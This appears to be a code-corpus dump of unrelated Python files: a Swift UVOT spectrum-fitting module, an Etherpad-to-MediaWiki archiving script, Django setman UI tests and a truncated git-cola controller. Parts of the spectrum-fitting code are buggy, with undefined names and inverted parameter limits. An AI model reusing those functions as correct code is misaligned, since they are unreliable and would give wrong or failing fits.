else:
vlast=v2
if vlast > v1: vrange.append([v1,vlast]) # last range
print "for quality="+fla+" we get ranges ",vrange
for v1 in vrange:
ax.axvspan(w[v1[0]],w[v1[1]],facecolor=colors[k],alpha=alpha)
# the algorithm skips two adjacent points which will be ignored.
def check_flag(quality,flag,chatter=0):
""" return a logical array where the elements are
True if flag is set """
from uvotgetspec import quality_flags
loc = np.zeros(len(quality),dtype=bool)
if flag == 'good': return loc
qf = quality_flags()[flag]
mf=qf.bit_length() # bytes in binary string -2
binflag = bin(qf) # string with binary flag
qf = []
for k in binflag: qf.append(k)
qf.reverse()
# find flag
for i in range(0,mf):
if qf[i]=="1":
kpos=i
break
if chatter> 4: print "flag = ",k," length=",mf
# skip the good ones
qz = np.where(quality > 0)[0]
if chatter > 4: print "qual > 0 at ",qz
if len(qz) == 0:
return loc
for i in qz :
bq = int(quality[i]) # data quality point i
mv = bq.bit_length() # binary length
binq = bin(bq)
qf=[]
for k in binq:
qf.append(k)
qf.reverse()
if mv < mf:
break
else:
if qf[kpos] == '1':
loc[i] = True
return loc
def get_continuum_values(wave,flux,cont_regions=[],):
"""give a list of good continuum bands in spectrum and
determine averages
parameters
----------
wave : array
wavelength array
flux : array
flux array
cont_regions : list
a list of [start, stop] wavelengths
returns
-------
cont_list: list
a list comprised of average wavelength, and continuum flux
value in each band
"""
if len(cont_regions) == 0: return
result = []
for r in cont_regions:
q = (wave > r[0]) & (wave <= r[1])
result.append([wave[q].mean(),flux[q].mean()])
return result
def get_smooth_continuum(cont_list,wave_range=[None,None],):
"""give a list of continuum points, put a smooth line
through them and return as a function valid on the
wave_range.
parameters
----------
cont_list: list
list items must be a list of [wavelength, flux] for
continuum points
wave_range : list
minimum and maximum wavelengths for the solution
returns
-------
a function that returns the continuum as a function of
wavelength
"""
import numpy as np
from scipy import interpolate
c = np.array(cont_list)
if c.shape[1] == 2:
w = c[:,0]
f = c[:,1]
else:
raise RuntimeError( "check the cont_list parameter" )
if wave_range[0] == None:
wave_range[0] = w.min()-250.0
if wave_range[1] == None:
wave_range[1] = w.max()+250.0
tck = interpolate.splrep(w,f,k=1,
xb=wave_range[0],xe=wave_range[1],
s=len(w)+np.sqrt(2*len(w)))
w = np.arange(wave_range[0],wave_range[1]+100,100)
f = interpolate.splev(w,tck,)
return interpolate.interp1d(w,f,)
def plot_spectrum(ax,phafile,errbars=False, errhaze=False,
hazecolor='grey', hazealpha=0.2, flag='all'):
f = fits.open(phafile)
q = f[2].data['quality']
r = quality_flags_to_ranges(q)
r = r[flag]
label = f[1].header['date-obs']
w = f[2].data['lambda']
flx = f[2].data['flux']
err = f[2].data['fluxerr']
if not witherr:
for rr in r:
ax.plot(w[rr[0]:rr[1]],flx[rr[0]:rr[1]],label=label)
if errhaze:
ax.fill_between(w[rr[0]:rr[1]],
flx[rr[0]:rr[1]]-err[rr[0]:rr[1]],
flx[rr[0]:rr[1]]+err[rr[0]:rr[1]],
color=hazecolor,alpha=hazealpha)
else:
ax.errorbar( w[rr[0]:rr[1]],flx[rr[0]:rr[1]],
yerr=err[rr[0]:rr[1]],label=label)
def quality_flags_to_ranges(quality):
"""given wavelength and quality flag arrays, reduce
the quality to ranges of a certain quality (except
for "good" = 0.)
parameters
----------
wave : array
x-axis values
quality : array
quality flags matching x-axis points
returns
-------
quality_ranges : dict
a dictionary of ranges for each flag except 'good'
"""
from uvotgetspec import quality_flags
flagdefs = quality_flags()
flags=flagdefs.keys()
quality_ranges = {}
val = []
for fla in flags:
if fla == 'good': break
fval = flagdefs[fla]
q = quality >= fval # limit the search
indx = np.where(q)[0] # indx of wave where flag
fval2 = fval*2
loc = quality[q]/fval2*fval2 != quality[q]
v = indx[loc] # indices of the points with this flag
if len(v) > 1: # require at least 2
vrange = []
v1 = v[0]
vlast = v1
for v2 in v[1:]:
if v2-vlast > 1: # require neighboring pixels
#
vrange.append([v1,vlast])
val.append([v1,vlast])
v1 = v2
vlast = v2
else:
vlast=v2
if vlast > v1: vrange.append([v1,vlast]) # last range
quality_ranges.update({fla:vrange})
quality_ranges.update({"all":val})
return quality_ranges
def complement_of_ranges(ranges,rangestart=0,rangeend=None):
"""given a list of exclusion ranges, compute the complement"""
print "needs to be completed"
class gaussian():
"""define a gaussian function
"""
def __init__(self,param=None):
self.parameters = {"model":"gauss",
"parinfo":[
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'amp'},
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'pos'},
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'sig'},]
}
def parameters(self):
return self.parameters
def value(self, x):
par = self.parameters["parinfo"]
for p in par:
if (p["parname"]=='amp'):
amp = p["value"]
for p in par:
if (p["parname"]=='pos'):
pos = p["value"]
for p in par:
if (p["parname"]=='sig'):
sig = p["value"]
return amp * np.exp( - ((x-pos)/sig)**2 )
def update(self,amp=None,pos=None,sig=None):
par = self.parameters["parinfo"] # this is a list
for p in par:
if (p["parname"]=='amp') & (amp != None):
p["value"]=amp
for p in par:
if (p["parname"]=='pos') & (pos != None):
p["value"]=pos
for p in par:
if (p["parname"]=='sig') & (sig != None):
p["value"]=sig
self.parameters["parinfo"]=par
class poly_background():
import numpy as np
def __init__(self,coef=[0]):
self.poly_coef = coef
def value(self,x):
return np.polyval(self.poly_coef,x)
def update(self,coef):
self.poly_coef=coef
class fit_spectrum():
"""
Fit the spectrum in a way similar to Xspec.
Parameters
==========
ax : matplotlib.axes.AxesSubplot instance
spectrum : spectrum
spectrum [currently second extension of spectrum file uvot grism]
fitparameters :
for each model to fit, a list of fit parameters
Notes
=====
The method of fitting is similar to that used in XSpec because
non-linear fitting is better done while freezing some parameters
at a time, depending on need, and iterating. This is superior to
automated fitting methods.
Initial set up:
Though the plan is to introduce models to fit to at some point,
the initial fitting will be for a continuum with gaussians.
"""
import sys
import numpy as np
from mpfit import mpfit
def __init__(self, ax, spectrum, fit_parameters=[], ):
self.spectrum = spectrum
self.fit_parameters = fit_parameters
self.ax = ax
self.funargs = []
self.models = [] # active models
self.valid_model_names=['gaussian','poly_background'] # implemented models
def add_model(self,modelname):
"""
Add a model to the fit_parameters
Notes
=====
open a new item and add the parameters and argument names of the
specific model
Build the parinfo list, e.g., we need a list with for each parameter:
parinfo = [
{'limited': [1,0], 'limits': [0.1,0.0], 'value': bg, 'parname': 'bg0'},
{'limited': [0,0], 'limits': [0.0,0.0], 'value': 0.0, 'parname': 'bg1' },
{'limited': [1,0], 'limits': [0.0,0.0], 'value': amp1, 'parname': 'amp1'},
{'limited': [1,1], 'limits': [pos1a,pos1b], 'value': pos1, 'parname': 'pos1'},
...
]
where
limited indicated if the limits are applied (1=True,0=False)
limits gives the parameter range
value gives the starting(or fixed) value
parname gives the parameter name
if the value needs to be fixed, the limits must be set to a very small range
for running mpfit (1e-5 * value?)
"""
# verify valid model name ?
# ...
if not (modelname in self.valid_model_names):
print "illegal model name"
print "valid names are :",self.valid_model_names
return
self.models.append(modelname)
fitparms, funargs = eval("self.model_"+modelname+"(0,init_parameters=True)")
self.fit_parameters.append( fitparms )
self.funargs.append( funargs )
def show_parameters(self,):
"""
print out the parameters and values
"""
#use write( sys.stdout, ) ???
print "comp model param value lower upper \n"
for k in range(len(self.models)):
modelno = k
name = self.fit_parameters[k]["model"]
params = self.fit_parameters[k]["parinfo"]
for p in params:
print "%2i %16s %8s %12.5e %12.5e %12.5e"%(k,name,p["parname"][:-2],
p["value"],p["limits"][0],p["limits"][1])
def update_parameters(self,component=None,name=None,value=None,lower=None,upper=None):
"""
Change the limits, start value, etc. for a model parameter
"""
fitparms = self.fit_parameters
print " not yet implemented -- need a widget "
if component == None: # do all components
for k in range(len(self.models)):
self.update_parameters(k,name=name,value=value,lower=lower,upper=upper)
else:
if component in range(len(self.models)):
parms = fitparms[component]
parnames = []
for z in parms['parinfo']:
parnames.append(z['parname'][:-2])
else:
print "illegal component number"
if name == None: # do all variables in parms
for m in range(len(parms['parinfo'])):
if value != None: parms['parinfo'][m]['value'] = value
if lower != None:
parms['parinfo'][m]['limits'][0] = lower
parms['parinfo'][m]['limited'][0] = 1
if upper != None:
parms['parinfo'][m]['limits'][1] = upper
parms['parinfo'][m]['limited'][1] = 1
else:
if name in parnames:
for i in range(len(parnames)):
if name == parnames[i]:
m=i
continue
if value != None: parms['parinfo'][m]['value'] = value
if lower != None:
parms['parinfo'][m]['limits'][0] = lower
parms['parinfo'][m]['limited'][0] = 1
if upper != None:
parms['parinfo'][m]['limits'][1] = upper
parms['parinfo'][m]['limited'][1] = 1
else:
print "illegal parameter name, valid names are :",parnames
def model_poly_background(self,p, fjac=None, x=None, y=None,
err=None,init_parameters=False):
# up to sixth order polynomial
if init_parameters:
component_number=len(self.models)
cn = "%02s"%(component_number)
return {"model":"poly_background", "parinfo":[
{"limited":[1,1],"limits":[1,1],"value":1, "parname":'order'+cn}, # fixed! limits=value
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'coef0'+cn},
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'coef1'+cn},
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'coef2'+cn},
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'coef3'+cn},
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'coef4'+cn},
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'coef5'+cn},
{"limited":[0,0],"limits":[0,0],"value":0.0,"parname":'coef6'+cn},
]},['x','y','err']
order = p[0]
if type(order) != int:
print "problem model_poly_background order not an int:", order
model = np.polyval(p[1:order+2],x)
status = 0
return [status, (y-model)/err]
def model_gaussian(self,p, fjac=None, x=None, y=None, err=None,init_parameters=False):
if init_parameters:
component_number=len(self.models)
cn = "%02s"%(component_number)
return {"model":"gauss","parinfo":[
{"limited":[0,0],"limits":[0,0],"value":1.0,"parname":'amp'+cn},
{"limited":[0,0],"limits":[0,0],"value":9.0,"parname":'pos'+cn},
{"limited":[0,0],"limits":[0,0],"value":0.5,"parname":'sig'+cn},
]}, ['x', 'y', 'err']
amp1,pos1,sig1 = p
model = amp1 * np.exp( - ((x-pos1)/sig1)**2 )
status = 0
return [status, (y-model)/err]
def fit(self,):
"""
call the fitter
"""
x = self.spectrum.wavelength
y = self.spectrum.flux
err = self.spectrum.fluxerr
# build initial parameter value list
p0 = []
pinfo = []
for x in self.fit_parameters:
par = x["parinfo"]
for pv in par:
p0.append(pv['value'])
pinfo.append(pv)
# build argument list
fkw={'x':x,'y':y,'err':err}
# call L-M fitter
Z = mpfit.mpfit(fit_function,p0,functkw=fkw,parinfo=pinfo,quiet=True)
if (Z.status <= 0): print 'fit_spectrum.mpfit error message = ', Z.errmsg
# update the fit (parinfo...?), return results
self.result = Z
return Z
def fit_function(self, p, fjac=None, x=None, y=None, err=None):
"""
Define the 1D spectrum function to fit
parameters
----------
x : array
the wavelengths
y : array
the estimated flux
err : array
the error
p : list
a list of parameters to fit
"""
F = 0.
i = 0
nmod = len(self.models)
for k in range(nmod):
npar = len(self.fitparms[k]["parinfo"])
arg = "("
p0 = []
for w in range(npar):
p[0].append( p[i])
i += 1
fjac_mod = fjac[i:i+npar,i:i+npar]
# fjac is a dummy parameter in gauss and poly_background
# any other use needs testing that the correct slice has
# been made ...
arg += ", fjac=fjac_mod, x=x, y=y, err=err)"
F = F + eval("model_"+self.models[k]+arg)
status = 0
if err != None:
return [status, (y-F)/err]
else:
return [status, (y-F)]
def runfit2(x,f,err,bg,amp1,pos1,sig1,amp2,pos2,sig2,
amp2lim=None,fixsig=False,
fixsiglim=0.2, fixpos=False,chatter=0):
'''
Fit two gaussians plus a linear varying background to f(x)
Parameters
==========
x : array
f : array
err : ?
bg : ?
gaussian_parameters : array
for each gaussian the array provides the following parameters
- amplitude f(xo)
- position xo in x
- sigma (width of the gaussian) fit=A.exp( - ((x-xo)/sig)**2 )
- lower limit on amplitude Amin or None
- upper limit on amplitude Amax ro None
- sig_lo lower limit on sigma
- sig_hi upper limit on sigma
- fixamp boolean (True or False) for fixed amplitude
- fixsig boolean (True or False) for fixed sigma
'''
import numpy as np
from mpfit import mpfit
gp = np.array(gaussian_parameters,)
n_gaussians = len(gaussian_parameters)
if np.isfinite(bg):
bg0 = bg
else: bg0 = 0.0
bg1 = 0.0
if np.isfinite(sig1):
sig1 = np.abs(sig1)
else: sig1 = 3.1
if np.isfinite(sig2):
sig2 = np.abs(sig2)
else: sig2 = 4.2
p0 = (bg0,bg1,amp1,pos1,sig1,amp2,pos2,sig2)
# define the variables for the function 'myfunct'
fa = {'x':x,'y':f,'err':err}
if fixpos:
pos1a = pos1-0.05
pos1b = pos1+0.05
pos2a = pos2-0.05
pos2b = pos2+0.05
else:
# adjust the limits to not cross half the predicted distance of orders
pos1a = pos1-sig1
pos1b = pos1+sig1
pos2a = pos2-sig1
pos2b = pos2+sig1
# case : pos1 < pos2
if (pos1 < pos2):
pos1b = pos2a = 0.5*(pos1+pos2)
else:
pos1a = pos2b = 0.5*(pos1+pos2)
if fixsig:
sig1_lo = sig1-fixsiglim
sig1_hi = sig1+fixsiglim
sig2_lo = sig2-fixsiglim
sig2_hi = sig2+fixsiglim
else:
# make sure lower limit sigma is OK
sig1_lo = max([sig1-10.,35.])
sig2_lo = max([sig2-10.,35.])
sig1_hi = min([sig1+10.,5.])
sig2_hi = min([sig2+10.,5.])
if amp2lim != None:
amp2min, amp2max = amp2lim
parinfo = [{ \
'limited': [1,0], 'limits' : [np.min([0.0,bg0]),0.0],'value': bg, 'parname': 'bg0' },{ \
'limited': [0,0], 'limits' : [0.0,0.0], 'value' : 0.0, 'parname': 'bg1' },{ \
'limited': [1,0], 'limits' : [0.0,0.0], 'value' : amp1, 'parname': 'amp1' },{ \
'limited': [1,1], 'limits' : [pos1a,pos1b], 'value' : pos1, 'parname': 'pos1' },{ \
'limited': [1,1], 'limits' : [sig1_lo,sig1_hi], 'value' : sig1, 'parname': 'sig1' },{ \
'limited': [1,1], 'limits' : [amp2min,amp2max], 'value' : amp2, 'parname': 'amp2' },{ \
'limited': [1,1], 'limits' : [pos2a,pos2b], 'value' : pos2, 'parname': 'pos2' },{ \
'limited': [1,1], 'limits' : [sig2_lo,sig2_hi], 'value' : sig2, 'parname': 'sig2' }]
else:
parinfo = [{ \
'limited': [1,0], 'limits' : [np.min([0.0,bg0]),0.0],'value': bg, 'parname': 'bg0' },{ \
'limited': [0,0], 'limits' : [0.0,0.0], 'value' : 0.0, 'parname': 'bg1' },{ \
'limited': [1,0], 'limits' : [0.0,0.0], 'value' : amp1, 'parname': 'amp1' },{ \
'limited': [1,1], 'limits' : [pos1a,pos1b], 'value' : pos1, 'parname': 'pos1' },{ \
'limited': [1,1], 'limits' : [sig1_lo,sig1_hi], 'value' : sig1, 'parname': 'sig1' },{ \
'limited': [1,0], 'limits' : [0.0,0.0], 'value' : amp2, 'parname': 'amp2' },{ \
'limited': [1,1], 'limits' : [pos2a,pos2b], 'value' : pos2, 'parname': 'pos2' },{ \
'limited': [1,1], 'limits' : [sig2_lo,sig2_hi], 'value' : sig2, 'parname': 'sig2' }]
if chatter > 4:
print "parinfo has been set to: "
for par in parinfo: print par
Z = mpfit(fit2,p0,functkw=fa,parinfo=parinfo,quiet=True)
if (Z.status <= 0):
print 'uvotgetspec.runfit2.mpfit error message = ', Z.errmsg
print "parinfo has been set to: "
for par in parinfo: print par
elif (chatter > 3):
print "\nparameters and errors : "
for i in range(8): print "%10.3e +/- %10.3e\n"%(Z.params[i],Z.perror[i])
return Z
def fit2(p, fjac=None, x=None, y=None, err=None):
import numpy as np
(bg0,bg1,amp1,pos1,sig1,amp2,pos2,sig2) = p
model = bg0 + bg1*x + \
amp1 * np.exp( - ((x-pos1)/sig1)**2 ) + \
amp2 * np.exp( - ((x-pos2)/sig2)**2 )
status = 0
return [status, (y-model)/err]
|
ISO-8859-1
|
Python
| false | false | 2,014 |
10,453,950,443,835 |
415bca727cd145c8c57c9a78014f012ff1901e78
|
eeb34a5d5b6564f88116a58cc35f4cc524edc949
|
/wikimtgs/__init__.py
|
12c54297340f0d633abbf3c704b9b31a7e93f7cb
|
[] |
no_license
|
kmaglione/wikimtgs
|
https://github.com/kmaglione/wikimtgs
|
99a2e6907655dd4ff868f3b15156accfcd959d76
|
5e90868efef6e8925a85e47dd3fc7cf64d625e08
|
refs/heads/master
| 2020-04-26T16:03:27.206924 | 2014-03-19T18:16:06 | 2014-03-19T18:16:06 | 17,762,919 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import re
import subprocess
import mwclient
import requests
class WikiMtgs(object):
SITE = {
'host': ('https', 'wiki.mozilla.org'),
'path': '/',
}
INDEX_START = 'NEW_MEETING_MINUTES_ENTRIES'
ETHERPAD_SITE = 'https://%(subpad)setherpad.mozilla.org'
ETHERPAD_CREATE = ETHERPAD_SITE + '/ep/pad/create'
@property
def etherpad_export(self):
return '%s/ep/pad/export/%s/latest?format=html' % (self.ETHERPAD_SITE,
self.etherpad_page)
@property
def etherpad_template(self):
return '%s/%s' % (self.ETHERPAD_SITE, self.etherpad_page)
@property
def archive_template(self):
return self.index_page + '/%(date)s'
def __init__(self, login, index_page, etherpad_page, etherpad_team=''):
self.etherpad_page = etherpad_page
self.index_page = index_page
self.login = login
self.subpad = etherpad_team
def params(self, date=None):
return {
'date': date,
'subpad': '%s.' % self.subpad if self.subpad else ''
}
def connect(self):
site = mwclient.Site(**self.SITE)
site.login(*self.login)
return site
def archive(self, date):
site = self.connect()
params = self.params(date=date)
etherpad = self.etherpad_template % params
export = self.etherpad_export % params
archive = self.archive_template % params
text = call('pandoc', '-fhtml', '-tmediawiki',
input=requests.get(export).text.encode('utf-8'))
site.pages[archive].save(
summary='Archiving meeting notes from %s to wiki' % etherpad,
text=text)
page = site.Pages[self.index_page]
page.save(summary='Archive notes for %s' % date,
text=page.edit().replace(etherpad,
'[[%s]]' % archive))
def create(self, date):
site = self.connect()
params = self.params(date=date)
etherpad = self.etherpad_template % params
create = self.ETHERPAD_CREATE % params
if False:
# Grr. Etherpad. This does not work as expected. I
# suspect it's because `requests` attempts to use
# HTTP/1.1
requests.post(create,
data=dict(padId=date))
else:
call('curl', '-LsdpadId=%s' % date, create)
page = site.Pages[self.index_page]
text = re.sub(self.INDEX_START + r'.*\n',
lambda r: r.group(0) + '* %s\n' % etherpad,
page.edit())
page.save(summary='Adding notes pad for %s' % date,
text=text)
def call(*args, **kwargs):
import os
import signal
background = kwargs.pop('background', False)
stdin = subprocess.PIPE if not background else open('/dev/null', 'r')
pipe = subprocess.PIPE if not background else None
input = kwargs.pop('input', None)
p = subprocess.Popen(args, stdin=stdin, stdout=pipe, stderr=pipe,
preexec_fn=lambda: signal.signal(signal.SIGPIPE, signal.SIG_DFL),
cwd=os.environ['HOME'], close_fds=True, **kwargs)
if not background:
return p.communicate(input)[0].rstrip('\n')
|
UTF-8
|
Python
| false | false | 2,014 |
9,680,856,329,908 |
805a1f9980cd60dd0c5a609daa2f9de0dd394788
|
5da610dbe48cfba9313aac0796b1f5afa859020e
|
/testproject-django/testapp/tests/test_ui.py
|
f58e956c374fbcb79cc2be9dd0ab83ee586c4c44
|
[
"BSD-3-Clause"
] |
permissive
|
playpauseandstop/setman
|
https://github.com/playpauseandstop/setman
|
cabb9dad3e449956b8a1ab1adb7f6cde9e0b156f
|
08fc786b0d7ad0216129c62e4907d6aa79643739
|
refs/heads/master
| 2020-04-01T19:44:39.438386 | 2012-01-27T16:54:20 | 2012-01-27T16:54:20 | 3,001,810 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import copy
from decimal import Decimal
from django.conf import settings as django_settings
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.test import TestCase as DjangoTestCase
from setman import get_version, settings
from setman.frameworks.django_setman.models import Settings
from setman.utils.parsing import is_settings_container
from testapp.forms import SandboxForm
from testapp.tests.test_models import TEST_SETTINGS
__all__ = ('TestAdminUI', 'TestAdminUIForbidden', 'TestUI', 'TestUIForbidden')
NEW_SETTINGS = {
'BOOLEAN_SETTING': True,
'CHOICE_SETTING': 'waterlemon',
'CHOICE_SETTING_WITH_LABELS': 'waterlemon',
'CHOICE_SETTING_WITH_GROUPS': 'Kate',
'CHOICE_SETTING_WITH_LABELS_AND_GROUPS': 'grape',
'CHOICE_SETTING_WITH_INTERNAL_CHOICES': 'editor',
'CHOICE_SETTING_WITH_INTERNAL_MODEL_CHOICES': 'senior_editor',
'DECIMAL_SETTING': Decimal('5.33'),
'INT_SETTING': 20,
'IP_SETTING': '192.168.1.2',
'FLOAT_SETTING': 189.2,
'STRING_SETTING': 'setting',
'testapp': {
'app_setting': 'someone',
'setting_to_redefine': 24,
},
'VALIDATOR_SETTING': 'abc xyz',
}
TEST_USERNAME = 'username'
WRONG_SETTINGS = {
'CHOICE_SETTING': ('pepper', ),
'CHOICE_SETTING_WITH_LABELS': ('pepper', ),
'CHOICE_SETTING_WITH_GROUPS': ('Michael', ),
'CHOICE_SETTING_WITH_LABELS_AND_GROUPS': ('pepper', ),
'CHOICE_SETTING_WITH_INTERNAL_CHOICES': ('admin', ),
'CHOICE_SETTING_WITH_INTERNAL_MODEL_CHOICES': ('admin', ),
'DECIMAL_SETTING': (Decimal(-1), Decimal(12), Decimal('8.3451')),
'INT_SETTING': (12, 48),
'IP_SETTING': ('127.0.0', ),
'FLOAT_SETTING': ('', ),
'STRING_SETTING': ('Not started from s', ),
'testapp': {
'app_setting': ('something', ),
'setting_to_redefine': (72, ),
},
'VALIDATOR_SETTING': ('abc', 'xyz', 'Something'),
}
class TestCase(DjangoTestCase):
def setUp(self):
self.old_AUTHENTICATION_BACKENDS = \
django_settings.AUTHENTICATION_BACKENDS
django_settings.AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
)
self.docs_url = reverse('docs')
self.edit_settings_url = reverse('setman_edit')
self.home_url = reverse('home')
self.revert_settings_url = reverse('setman_revert')
self.sandbox_url = reverse('sandbox')
self.view_settings_url = reverse('view_settings')
def tearDown(self):
django_settings.AUTHENTICATION_BACKENDS = \
self.old_AUTHENTICATION_BACKENDS
def check_labels(self, response, available_settings=None):
available_settings = available_settings or settings.available_settings
for setting in available_settings:
if is_settings_container(setting):
self.check_labels(response, setting)
else:
self.assertContains(response, setting.label)
self.assertContains(response, setting.help_text)
def check_values(self, settings, data):
for name, value in data.items():
mixed = getattr(settings, name)
if is_settings_container(mixed):
self.check_values(mixed, data.get(name))
else:
self.assertEqual(mixed, value)
def login(self, username, is_admin=False):
try:
user = User.objects.get(username=username)
except User.DoesNotExist:
user = User.objects.create_user(username=username,
password=username,
email=username + '@domain.com')
else:
user.set_password(username)
user.save()
if is_admin:
user.is_staff = True
user.is_superuser = True
user.save()
client = self.client
client.login(username=username, password=username)
return client
def to_post_data(self, data, prefix=None):
data = copy.deepcopy(data)
post_data = {}
for key, value in data.items():
if isinstance(value, dict):
post_data.update(self.to_post_data(value, key))
else:
if prefix:
key = '.'.join((prefix, key))
post_data.update({key: value})
return post_data
class TestAdminUI(TestCase):
def setUp(self):
super(TestAdminUI, self).setUp()
self.add_url = reverse('admin:django_setman_settings_add')
self.admin_url = reverse('admin:index')
self.edit_url = reverse('admin:django_setman_settings_changelist')
def test_admin(self):
relative = lambda url: url.replace(self.admin_url, '')
response = self.client.get(self.admin_url)
self.assertNotContains(response, 'Settings Manager')
self.assertNotContains(response, 'Settings</a>')
client = self.login(TEST_USERNAME, is_admin=True)
response = client.get(self.admin_url)
self.assertContains(response, 'Settings Manager')
self.assertContains(
response, '<a href="%s">Settings</a>' % relative(self.edit_url)
)
self.assertNotContains(
response, '<a href="%s" class="addlink">Add</a>' % \
relative(self.add_url)
)
self.assertContains(
response,
'<a href="%s" class="changelink">Change</a>' % \
relative(self.edit_url)
)
def test_admin_edit(self):
client = self.login(TEST_USERNAME, is_admin=True)
response = client.get(self.edit_url)
self.check_labels(response)
response = client.post(self.edit_url, self.to_post_data(NEW_SETTINGS))
self.assertEqual(response.status_code, 302)
self.assertIn(self.edit_url, response['Location'])
self.check_values(settings, NEW_SETTINGS)
class TestAdminUIForbidden(TestCase):
def setUp(self):
super(TestAdminUIForbidden, self).setUp()
self.admin_url = reverse('admin:index')
self.old_auth_permitted_func = settings._framework.auth_permitted_func
settings._framework.auth_permitted_func = lambda request: False
def tearDown(self):
settings._framework.auth_permitted_func = self.old_auth_permitted_func
def test_admin(self):
client = self.login(TEST_USERNAME, is_admin=True)
response = client.get(self.admin_url)
self.assertNotContains(response, 'Settings Manager')
self.assertNotContains(response, 'Settings</a>')
class TestUI(TestCase):
def test_docs(self):
client = self.login(TEST_USERNAME)
response = client.get(self.docs_url, follow=True)
try:
self.assertContains(response, 'Documentation', count=2)
except AssertionError:
self.assertContains(
response,
'django-setman %s documentation' % get_version(),
count=4
)
def test_edit_settings(self):
client = self.login(TEST_USERNAME)
response = client.get(self.edit_settings_url)
self.assertContains(response, 'Edit Settings', count=2)
self.check_labels(response)
data = self.to_post_data(NEW_SETTINGS)
response = client.post(self.edit_settings_url, data)
self.assertEqual(response.status_code, 302)
self.assertIn(self.edit_settings_url, response['Location'])
settings._backend.clear()
self.check_values(settings, NEW_SETTINGS)
def test_edit_settings_errors(self):
client = self.login(TEST_USERNAME)
for key, values in WRONG_SETTINGS.items():
old_value = getattr(settings, key)
for value in values:
data = copy.deepcopy(TEST_SETTINGS)
data.update({key: value})
response = client.post(self.edit_settings_url, data)
self.assertContains(
response,
'Settings cannot be saved cause of validation issues. ' \
'Check for errors below.'
)
self.assertContains(response, '<dd class="errors">')
settings._backend.clear()
if is_settings_container(old_value):
new_value = getattr(settings, key)
self.assertTrue(is_settings_container(new_value))
self.assertEqual(old_value._prefix, new_value._prefix)
else:
self.assertEqual(getattr(settings, key), old_value)
def test_edit_settings_not_duplicated_validation(self):
client = self.login(TEST_USERNAME)
data = copy.deepcopy(TEST_SETTINGS)
data.update({'INT_SETTING': 128})
response = client.post(self.edit_settings_url, data)
self.assertContains(
response, 'Ensure this value is less than or equal to 32.',
count=1
)
def test_home(self):
client = self.login(TEST_USERNAME)
response = client.get(self.home_url)
self.assertContains(
response,
'<li><a href="%s">Edit test project settings</a></li>' % \
self.edit_settings_url
)
self.assertContains(
response,
'<li><a href="%s">Sandbox</a></li>' % self.sandbox_url
)
self.assertContains(
response,
'<li><a href="%s">View configuration definition and default ' \
'values files</a></li>' % self.view_settings_url
)
def test_home_not_authenticated(self):
response = self.client.get(self.home_url, follow=True)
self.assertContains(
response,
'Log in with oDesk account <a href="%s?next=/">here</a>.' % \
reverse('django_odesk.auth.views.authenticate')
)
def test_revert_settings(self):
Settings.objects.create(data=NEW_SETTINGS)
client = self.login(TEST_USERNAME)
response = client.get(self.revert_settings_url)
self.assertEquals(response.status_code, 302)
self.assertIn(self.edit_settings_url, response['Location'])
self.check_values(settings, TEST_SETTINGS)
def test_sandbox(self):
client = self.login(TEST_USERNAME)
response = client.get(self.sandbox_url)
self.assertContains(response, 'Sandbox', count=2)
self.assertContains(response, 'Name:</label></dt>')
self.assertNotContains(response, '<dt>Value:</dt>')
response = client.post(self.sandbox_url, data={'name': 'DEBUG'})
self.assertContains(response, '<dt>Value:</dt>')
self.assertContains(response, '%s' % django_settings.DEBUG)
response = client.post(self.sandbox_url, data={'name': 'IP_SETTING'})
self.assertContains(response, '<dt>Value:</dt>')
self.assertContains(response, settings.IP_SETTING)
def test_sandbox_errors(self):
client = self.login(TEST_USERNAME)
for name in SandboxForm.FORBIDDEN_SETTINGS:
response = client.post(self.sandbox_url, {'name': name})
self.assertContains(
response, 'The value for this setting is forbidden.'
)
self.assertNotContains(response, '<dt>Value:</dt>')
if getattr(django_settings, name):
self.assertNotContains(
response, '%s' % getattr(django_settings, name)
)
def test_view_settings(self):
client = self.login(TEST_USERNAME)
response = client.get(self.view_settings_url)
self.assertContains(
response, 'Configuration Definition and Default Values Files',
count=2
)
self.assertContains(
response, 'Configuration Definition File', count=2
)
self.assertContains(
response, 'Project Configuration Definition File', count=1
)
self.assertContains(
response, 'Apps Configuration Definition Files', count=1
)
self.assertContains(response, 'App: testapp', count=1)
self.assertContains(response, 'Default Values File', count=3)
class TestUIForbidden(TestCase):
def setUp(self):
super(TestUIForbidden, self).setUp()
self.old_auth_permitted_func = settings._framework.auth_permitted_func
settings._framework.auth_permitted_func = \
lambda request: request.user.is_superuser
def tearDown(self):
settings._framework.auth_permitted_func = self.old_auth_permitted_func
def test_edit_settings_forbidden(self):
client = self.login(TEST_USERNAME)
response = client.get(self.edit_settings_url)
self.assertContains(response, 'Access Forbidden', status_code=403)
def test_revert_settings_forbidden(self):
client = self.login(TEST_USERNAME)
response = client.get(self.revert_settings_url)
self.assertContains(response, 'Access Forbidden', status_code=403)
|
UTF-8
|
Python
| false | false | 2,012 |
4,750,233,835,028 |
4cc0d712f11f98c3981d804ca6aedc23ff95fca2
|
d951044b543c7bc727de6aa741c5250385bad2bd
|
/cola/controllers/options.py
|
f767bed19c1228826d2807193e98dfb622506b84
|
[
"GPL-2.0-or-later",
"GPL-2.0-only"
] |
non_permissive
|
kbielefe/git-cola
|
https://github.com/kbielefe/git-cola
|
47a1b10eeac28bf011f48bdccdf09d0c325dd161
|
3a459d32e31fbdbf779353abbb967eb0796ecce8
|
refs/heads/master
| 2021-01-17T22:10:14.014409 | 2011-08-09T22:58:14 | 2011-08-09T22:58:14 | 2,217,654 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
"""This module provides the controller for the options gui
"""
from PyQt4 import QtGui
from PyQt4.QtCore import SIGNAL
import cola
from cola import qtutils
from cola import serializer
from cola.views import option
from cola.qobserver import QObserver
def update_options():
"""Launch the options window given a model and parent widget."""
